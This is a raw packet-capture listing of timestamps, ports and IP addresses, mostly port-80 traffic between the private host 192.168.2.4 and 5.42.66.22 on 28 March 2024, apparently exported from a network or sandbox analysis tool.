Mar 28, 2024 09:15:00.039943933 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.040584087 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.040601969 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.040637970 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.040658951 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.041548014 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.041570902 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.041589975 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.041611910 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.042061090 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.042102098 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.042781115 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.042788982 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.042840958 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.043311119 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.043319941 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.043365002 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.044763088 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.044785023 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.044817924 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.045042038 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.045062065 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.045083046 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.045100927 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.046730995 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.046745062 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.046782970 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.047219038 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.047297955 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.048403025 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.048417091 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.048453093 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.048476934 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.049726963 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.049823046 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.049854994 CET	49772	443	192.168.2.4	104.21.42.248
Mar 28, 2024 09:15:00.049864054 CET	443	49772	104.21.42.248	192.168.2.4
Mar 28, 2024 09:15:00.050041914 CET	49770	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:15:00.050117970 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.050127029 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.050168037 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.050228119 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.050235033 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.050267935 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.050719976 CET	49775	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:15:00.051732063 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.051740885 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.051781893 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.052532911 CET	49772	443	192.168.2.4	104.21.42.248
Mar 28, 2024 09:15:00.052541971 CET	443	49772	104.21.42.248	192.168.2.4
Mar 28, 2024 09:15:00.052975893 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.052977085 CET	49769	443	192.168.2.4	52.216.219.33
Mar 28, 2024 09:15:00.052984953 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.052998066 CET	443	49769	52.216.219.33	192.168.2.4
Mar 28, 2024 09:15:00.053028107 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.053369045 CET	443	49769	52.216.219.33	192.168.2.4
Mar 28, 2024 09:15:00.053400993 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.053415060 CET	49769	443	192.168.2.4	52.216.219.33
Mar 28, 2024 09:15:00.053431988 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.053443909 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.053467989 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.053745985 CET	49769	443	192.168.2.4	52.216.219.33
Mar 28, 2024 09:15:00.054301023 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.054428101 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.055041075 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.055066109 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.055103064 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.055128098 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.055267096 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.055318117 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.055361032 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.056798935 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.056952000 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.057005882 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.057032108 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.058247089 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.058255911 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.058294058 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.058310986 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.058331966 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.058341026 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.058363914 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.059986115 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.060004950 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.060076952 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.060590982 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.060600042 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.060647964 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.061579943 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.061609030 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.061649084 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.063085079 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.063093901 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.063153982 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.063236952 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.063246012 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.063285112 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.064802885 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.064826965 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.064881086 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.065805912 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.065848112 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.066456079 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.066463947 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.066500902 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.067975044 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.068023920 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.068031073 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.068057060 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.068202972 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.068242073 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.068269014 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.068289995 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.069586039 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.069593906 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.069633961 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.070920944 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.070929050 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.070980072 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.071105003 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.071120024 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.071166992 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.072674036 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.072705984 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.072730064 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.072760105 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.073466063 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.073473930 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.073524952 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.074235916 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.074291945 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.074336052 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.074352980 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.074624062 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.074841022 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.075720072 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.075773954 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.075790882 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.075803995 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.075817108 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.075835943 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.075853109 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.077418089 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.077461004 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.077465057 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.077519894 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.078326941 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.078376055 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.078859091 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.078931093 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.078972101 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.080447912 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.080502033 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.080542088 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.081056118 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.081111908 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.081212044 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.081408024 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.081950903 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.082000017 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.082004070 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.082043886 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.083435059 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.083473921 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.083515882 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.083535910 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.083556890 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.083563089 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.083585978 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.085057974 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.085123062 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.085179090 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.085823059 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.085860014 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.085912943 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.086421013 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.086468935 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.086703062 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.086853027 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.086867094 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.086901903 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.086920023 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.086920023 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.087753057 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.087806940 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.088000059 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.088054895 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.088083982 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.088125944 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.089447021 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.089505911 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.091262102 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.092325926 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.092390060 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.092464924 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.092466116 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.092716932 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.092760086 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.092807055 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.093894958 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.095168114 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.095192909 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.095247984 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.095249891 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.095344067 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.095372915 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.095412970 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.097738981 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.097776890 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.097891092 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.097980022 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.098002911 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.098020077 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.100229025 CET	443	49769	52.216.219.33	192.168.2.4
Mar 28, 2024 09:15:00.100303888 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.100311995 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.100452900 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.100670099 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.100677967 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.100716114 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.102014065 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.102066994 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.102082014 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.102143049 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.102624893 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.102698088 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.102732897 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.102895975 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.103410006 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.103425980 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.103466988 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.104609966 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.104619026 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.104664087 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.105705023 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.105848074 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.106007099 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.107115030 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.107132912 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.107146978 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.107175112 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.107203007 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.108654022 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.108676910 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.108722925 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.109289885 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.109297991 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.109342098 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.109939098 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.109986067 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.111193895 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.111231089 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.111274004 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.111692905 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.112379074 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.113827944 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.113853931 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.113874912 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.113899946 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.113903999 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.113918066 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.113938093 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.113938093 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.116214991 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.116239071 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.116274118 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.116302967 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.116381884 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.116390944 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.116434097 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.118782997 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.118797064 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.118848085 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.118863106 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.119174004 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.119225979 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.120845079 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.120884895 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.120920897 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.120970964 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.121931076 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.121997118 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.122047901 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.122087002 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.122126102 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.123178005 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.123210907 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.123286963 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.124152899 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.124203920 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.124253988 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.125561953 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.125571012 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.125619888 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.126652956 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.126717091 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.127216101 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.127244949 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.127728939 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.128918886 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.128982067 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.128983021 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.129098892 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.129585981 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.129625082 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.129640102 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.129656076 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.129673958 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.130172968 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.130229950 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.130584002 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.130652905 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.131664038 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.131702900 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.131757021 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.131978989 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.132021904 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.132069111 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.133980036 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.134015083 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.134090900 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.134177923 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.136113882 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.136146069 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.136182070 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.136208057 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.136617899 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.136713028 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.136759043 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.138533115 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.138539076 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.138581038 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.139050007 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.139066935 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.139188051 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.140507936 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.140516043 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.140559912 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.141263008 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.141271114 CET	80	49735	5.42.66.22	192.168.2.4
